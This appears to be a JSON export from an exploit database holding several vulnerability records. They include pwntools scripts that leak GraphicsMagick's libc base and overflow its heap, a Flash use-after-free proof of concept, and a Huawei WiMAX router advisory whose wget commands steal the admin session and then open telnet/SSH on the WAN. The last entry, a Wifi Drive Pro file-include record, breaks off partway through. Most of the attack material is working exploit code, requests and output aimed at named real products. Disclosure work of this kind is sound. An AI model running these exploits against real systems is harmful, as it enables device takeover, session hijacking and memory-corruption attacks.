{"result": {"zdt": [{"lastseen": "2018-04-03T00:19:14", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "SecuriTeam", "published": "2017-11-03T00:00:00", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-03T00:19:14", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/", "value": 8.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16352", "CVE-2017-16353"], "modified": "2017-11-03T00:00:00", "id": "1337DAY-ID-28948", "href": "https://0day.today/exploit/description/28948", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nTwo independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), have reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerabilities details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code 
containing the vulnerability is responsible for printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value of the profile_length variable is set by the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed, because the increments of i are never checked against profile_length inside the loop body.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 are the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes 
apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = 
output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file 
with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28948"}, {"lastseen": "2018-01-01T17:04:04", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "reporter": "Google Security Research", "published": 
"2016-09-08T00:00:00", "title": "Adobe Flash - Method Calls Use-After-Free", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-01T17:04:04", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-09-08T00:00:00", "id": "1337DAY-ID-24811", "href": "https://0day.today/exploit/description/24811", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846\r\n \r\nIf a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:\r\n \r\nvar mc = this.createEmptyMovieClip( \"mc\", 1);\r\nmc.addProperty( \"f\", func, func );\r\nmc.f(\"hello\");\r\n \r\nfunction func(){\r\n \r\n mc.removeMovieClip();\r\n // Fix heap\r\n var d:Date = new Date();\r\n return d.getDate;\r\n \r\n } \r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24811"}, {"lastseen": "2018-03-02T01:40:17", "references": [], "description": "Exploit for hardware platform in category web applications", "edition": 2, "reporter": "Pierre Kim", "published": "2015-12-01T00:00:00", "title": "Huawei Wimax CSRF / Information Disclosure / Manipulation Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-02T01:40:17", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-12-01T00:00:00", "id": "1337DAY-ID-24638", "href": "https://0day.today/exploit/description/24638", "sourceData": "## Advisory Information\r\n\r\nTitle: Huawei Wimax routers vulnerable to multiple threats\r\nAdvisory URL: https://pierrekim.github.io/advisories/2015-huawei-0x01.txt\r\nBlog URL: 
https://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html\r\nDate published: 2015-12-01\r\nVendors contacted: Huawei, CERT.org\r\nRelease mode: Released\r\nCVE: no current CVE\r\nCERT Tracking number: VU#406192\r\nCNNVD: no current CNNVD\r\n\r\n\r\n\r\n## Product Description\r\n\r\nHuawei Technologies Co. Ltd. is a Chinese multinational networking\r\nand telecommunications equipment and services company.\r\nIt is the largest telecommunications equipment manufacturer in the world.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Huawei BM626e device is a Wimax router / access point overall badly\r\ndesigned with a lot of vulnerabilities. The device is provided by\r\nMTN Cote d'Ivoire as a \"Wibox\". It's available in a number of countries to\r\nprovide Internet with a Wimax network.\r\n\r\nThe tests below are done using the last available firmware\r\n(firmware V100R001CIVC24B010).\r\n\r\nNote: This firmware is being used by other Huawei Wimax CPEs and\r\nHuawei confirmed that the devices below are vulnerable to the same threats:\r\n\r\n - EchoLife BM626e WiMAX CPE\r\n - EchoLife BM626 WiMAX CPE\r\n - EchoLife BM635 WiMAX CPE\r\n - EchoLife BM632 WiMAX CPE\r\n - EchoLife BM631a WiMAX CPE\r\n - EchoLife BM632w WiMAX CPE\r\n - EchoLife BM652 WiMAX CPE\r\n\r\nThe routers are still on sale and used in several countries. They are\r\nused, at least, in these countries:\r\n\r\n - MTN CI (Cote d'Ivoire)\r\n - Iran Cell (Iran)\r\n - Irak Telecom (Irak)\r\n - Libyamax (Libya)\r\n - Globe Telecom (Philippines)\r\n - Zain Bahrain (Bahrain)\r\n - FreshTel (Ukraine)\r\n\r\n\r\n\r\n## Details - unauthenticated information disclosure\r\n\r\nBy default, the webpage http://192.168.1.1/check.html contains\r\nimportant information\r\n(wimax configuration, network configuration, wifi and sip\r\nconfiguration ...) 
and is reachable without authentication.\r\n\r\nA JavaScript redirection will annoy the attacker (/login.html) and can\r\nbe easily defeated by using wget:\r\n\r\n [email\u00a0protected]:~# wget http://192.168.1.1/check.html; less check.html\r\n\r\n\r\n\r\n## Details - Admin session cookie hijacking\r\n\r\nIf an admin is currently managing the device (OR used the device but\r\ndidn't properly disconnect),\r\nthe current/used session can be stolen by an attacker located in the\r\nLAN (or WAN if the HTTP is open in the WAN interface).\r\n\r\nThe admin session id (\"SID\") can be recovered in multiple webpages\r\nwithout authentication:\r\n\r\n - http://192.168.1.1/wimax/security.html\r\n - http://192.168.1.1/static/deviceinfo.html\r\n - ...\r\n\r\nThe security.html webpage contains a valid session ID, without\r\nauthentication, within the JavaScript sources:\r\n\r\n sid=\"SID24188\"\r\n\r\n\r\nA \"protection\" is written in JavaScript and will redirect the attacker\r\nto the login webpage,\r\nbut the JavaScript contains the session of the admin (sid=\"SIDXXXXX\"),\r\nso the attacker can retrieve it easily using wget:\r\n\r\n [email\u00a0protected]:~# wget http://192.168.1.1/wimax/security.html ; less security.html\r\n [email\u00a0protected]:~# wget http://192.168.1.1/static/deviceinfo.html ; less\r\ndeviceinfo.html\r\n\r\nNote that, by visiting the webpages, the attacker will also disconnect\r\nthe administrator from the Control Panel (http://192.168.1.1/)\r\n\r\n\r\n\r\n## Details - Information disclosure and CSRF using the stolen admin session ID\r\n\r\nBy using the previously stolen SID, it is possible to perform\r\nadministration tasks without having proper credentials:\r\n\r\n - editing the WLAN configuration,\r\n - editing the WAN configuration,\r\n - editing the LAN configuration,\r\n - opening HTTP/HTTPS/TELNET/SSH in the LAN and WAN interfaces,\r\n - changing DMZ configurations,\r\n - editing PortMapping,\r\n - editing Porttrigger,\r\n - editing SIP 
configuration,\r\n - uploading a custom firmware,\r\n - ...\r\n\r\n\r\no Retrieve private information (network information):\r\n\r\n\r\n [email\u00a0protected]:~# wget -qO-\r\n'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0'\r\n Saving to: `STDOUT'\r\n\r\n stats={};do{stats.dhcplist=\"44:8A:5B:AA:AA:AA,192.168.1.3,71:52:[email\u00a0protected]:E0:4C:AA:AA:AA,192.168.1.2,71:52:02\";\r\n stats.reth=\"\r\n eth0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:27 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:109 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:2887 (2.8 KiB) TX bytes:46809 (45.7 KiB)\r\n Interrupt:9 Base address:0x4000\r\n eth1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n Interrupt:9 Base address:0x4000\r\n eth2 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:2530 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:2619 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:351557 (343.3 KiB) TX bytes:536669 (524.0 KiB)\r\n Interrupt:9 Base address:0x4000\r\n eth3 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:1\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n Interrupt:9 Base address:0x4000\r\n \";stats.wlaninfo=\"\r\n wl0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:5257 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:846 
errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:1000\r\n RX bytes:1117126 (1.0 MiB) TX bytes:279600 (273.0 KiB)\r\n wl1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n [...]\r\n\r\n [email\u00a0protected]:~#\r\n\r\n\r\n\r\no Retrieve private information:\r\n\r\nAn other JSX webpage:\r\nhttp://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0\r\n\r\n [email\u00a0protected]:~# wget -qO-\r\n'http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0'\r\n stats={};do{stats.PPPoEStatus='Disconnected';\r\nstats.GREStatus='Disconnected';stats.wpsmode=\"7\";stats.position=\"Idle,Idle,\"}while(0);\r\n\r\nIt's possible to get a lot of information by abusing JSX webpages.\r\nListing the JSX webpages is left as an exercise for the reader.\r\n\r\n\r\n\r\n\r\nThe Session ID can be used to change parameters in the Wimax router too:\r\n\r\no Editing the WLAN configuration:\r\n\r\nThis request will change the first SSID name to 'powned' (you need to\r\nedit the WWW_SID, by the one provided in the /wimax/security.html\r\nwebpage):\r\n\r\n [email\u00a0protected]:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_1; SecondMenu=User_1_1;\r\nThirdMenu=User_1_1_1\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=wlan.html&SERVICE=wifi&SLEEP=2&WLAN_WifiEnable=1&Wlan_chkbox=0&WLAN_WirelessMode=9&WLAN_Channel=0&WLAN_SSID1=powned&WLAN_HideSSID=0%3B0%3B&WLAN_AuthMode=WPAPSKWPA2PSK%3BWPAPSKWPA2PSK%3B&WLAN_EncrypType=TKIPAES%3BTKIPAES%3B&WLAN_COUNTRY_REGION=1&WLAN_Country_Code=1d&WLAN_TXPOWER_NOR=13&WLAN_MAXNUM_STA=16%3B16%3B&WLAN_FragThreshold=2346&WLAN_BeaconPeriod=100&WLAN_RTSThreshold=2347&WLAN_BssidNum=2&WLAN_WscConfMode=7&WLAN_WscAction=3&WLAN_CountryCode=CI&WLAN_WscPinCode=&WLAN_TXRATE=0&WLAN_HTBW=0&WLAN_NTH_SSID=1&WLAN_PinFlag=2'\r\nhttp://192.168.1.1/basic/mtk.cgi\r\n\r\n\r\no Opening the management 
interface:\r\n\r\nThis request will open HTTP/HTTPS/TELNET/SSH in the LAN AND the WAN\r\ninterfaces (you need to edit the WWW_SID, by the one provided in the\r\n/wimax/security.html webpage):\r\n\r\n [email\u00a0protected]:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;\r\nThirdMenu=User_2_1_0\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TELNETD_PORT=23&SSHD_PORT=22'\r\nhttp://192.168.1.1/basic/mtk.cgi\r\n\r\n (The legit administrator can check the changes here:\r\nhttp://192.168.1.1/advanced/acl.html)\r\n\r\n\r\no Changing \"DMZ action\" - redirecting WAN ports to a target client\r\nlocated in the LAN (you need to edit the WWW_SID, by the one provided\r\nin the /wimax/security.html webpage):\r\n\r\n [email\u00a0protected]:~# wget --no-cookies --header \"Cookie:\r\nLoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1;\r\nThirdMenu=User_2_1_0\"\r\n--post-data='WWW_SID=SID24188&REDIRECT=dmz.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_HOST=192.168.1.2&NETFILTER_DMZ_ENABLE=1&DMZInterface=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1&DMZHostIPAddress=192.168.1.2&DMZEnable=on&TriggerPort=&TriggerPortEnd='\r\nhttp://192.168.1.1/advanced/user.cgi\r\n\r\n (The legit administrator can check the changes here:\r\nhttp://192.168.1.1/advanced/dmz.html)\r\n\r\n\r\nOther actions are possible and are left as an exercise for the reader:\r\n\r\n - Editing PortMapping\r\n - Editing Porttrigger\r\n - Editing Sip configuration\r\n - Uploading a custom firmware\r\n - ...\r\n\r\n\r\n\r\n## Vendor Response\r\n\r\nThe vulnerable routers are in the End Of Service cycle and will not be\r\nsupported anymore.\r\n\r\nThe vendor encourages its clients to discard 
existing unsupported models\r\nand to use new routers.\r\n\r\n\r\n\r\n## Report Timeline\r\n\r\n * Jul 01, 2015: Vulnerabilities found by Pierre Kim.\r\n * Oct 28, 2015: Huawei PSIRT is notified of the vulnerabilities.\r\n * Oct 28, 2015: Huawei PSIRT confirms the notification.\r\n * Nov 03, 2015: Huawei PSIRT is unable to reproduce the\r\nvulnerabilities (\"We cannot open the following web pages without\r\nauthentication\")\r\n * Nov 03, 2015: Pierre Kim informs Huawei to deactivate JavaScript\r\nand gives Huawei a complete scenario with Linux commands. Pierre Kim\r\nasks for their firmware version.\r\n * Nov 04, 2015: Pierre Kim asks Huawei about potential difficulties\r\nwith the provided scenario.\r\n * Nov 05, 2015: Huawei PSIRT says that they are currently working on\r\nthe firmware version issue and will notify in due course.\r\n * Nov 09, 2015: Huawei PSIRT confirms the vulnerabilities affecting\r\nEchoLife BM626e WiMAX CPE. \"All the versions of this product are\r\nvulnerable\".\r\n * Nov 09, 2015: Pierre Kim asks about 8 other Wimax models which are\r\nlikely to be vulnerable too (using the same firmware) and asks\r\nwhether security patches will be distributed or the devices are EoL.\r\n * Nov 11, 2015: Huawei PSIRT notifies that the investigation of 8 other\r\nWimax models is in progress.\r\n * Nov 18, 2015: Huawei PSIRT confirms 6 models are affected (EchoLife\r\nBM626 WiMAX CPE, EchoLife BM635 WiMAX CPE, EchoLife BM632 WiMAX CPE,\r\nEchoLife BM631a WiMAX CPE, EchoLife BM632w WiMAX CPE, EchoLife BM652\r\nWiMAX CPE). 
The routers are in the End Of Service cycle and Huawei\r\nwill not support these models or provide a fixed version or patch.\r\n * Nov 18, 2015: Huawei PSIRT asks to be notified when the advisory is posted.\r\n * Nov 19, 2015: Pierre Kim contacts CERT.org about the vulnerabilities.\r\n * Nov 23, 2015: CERT.org assigns VU#406192.\r\n * Nov 30, 2015: Pierre Kim indicates to Huawei PSIRT that he will\r\nrelease the advisory on December 1, 2015.\r\n * Dec 01, 2015: A public advisory is sent to security mailing lists.\r\n\r\n\r\n\r\n## Credit\r\n\r\nThese vulnerabilities were found by Pierre Kim (@PierreKimSec).\r\n\r\n\r\n\r\n## References\r\n\r\nhttps://pierrekim.github.io/advisories/2015-huawei-0x01.txt\r\nhttps://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24638"}, {"lastseen": "2018-04-05T23:38:55", "references": [], "description": "Wifi Drive Pro version 1.2 suffers from a local file inclusion vulnerability.", "edition": 2, "reporter": "bot", "published": "2015-04-21T00:00:00", "title": "Wifi Drive Pro 1.2 Local File Inclusion Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-05T23:38:55", "vector": "AV:L/AC:M/Au:M/C:N/I:N/A:C/", "value": 4.1}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-04-21T00:00:00", "id": "1337DAY-ID-23556", "href": "https://0day.today/exploit/description/23556", "sourceData": "Document Title:\r\n===============\r\nWifi Drive Pro v1.2 iOS - File Include Web Vulnerability\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThis app lets you use your iPhone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.\r\nUsing the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you 
go.\r\n\r\n(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Core Research Team discovered a file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.\r\n\r\nAffected Product(s):\r\n====================\r\nMindspeak Software\r\nProduct: Wifi Drive Pro - iOS Mobile Web Application 1.2\r\n\r\nTechnical Details & Description:\r\n================================\r\nA local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.\r\nThe local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands \r\nto compromise the mobile web-application.\r\n\r\nThe web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject their own files with malicious \r\n`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occurs in \r\nthe index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` \r\nin connection with the vulnerable file upload POST method request. \r\n\r\nRemote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious \r\nattack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. \r\n\r\nThe security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. \r\nExploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. 
Successful exploitation \r\nof the local file include web vulnerability results in mobile application compromise or connected device component compromise.\r\n\r\nRequest Method(s):\r\n [+] [POST]\r\n\r\nVulnerable Module(s):\r\n [+] File Upload\r\n\r\nVulnerable Parameter(s):\r\n [+] filename\r\n\r\nAffected Module(s):\r\n [+] Index File Dir Listing (http://localhost:49276/)\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.\r\nFor security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.\r\n\r\nPoC: GET\r\nhttp://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\r\n\r\n\r\nPoC: Vulnerable Source\r\n<p><a href=\"..\">..</a><br>\r\n<a href=\"68-2.png\">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>\r\n<a href=\"/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />\r\n</p><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"form1\" id=\"form1\"><label>upload file<input type=\"file\" name=\"file\" id=\"file\" /></label>\r\n<label><input type=\"submit\" name=\"button\" id=\"button\" value=\"Submit\" /></label></form></body></html></iframe></a></p>\r\n\r\n\r\n--- PoC Session Logs [POST] (Inject)---\r\nStatus: 200[OK]\r\nPOST http://localhost:49276/ \r\nLoad Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr\u00f6\u00dfe des Inhalts[846] Mime Type[application/x-unknown-content-type]\r\n Request Header:\r\n Host[localhost:49276]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n 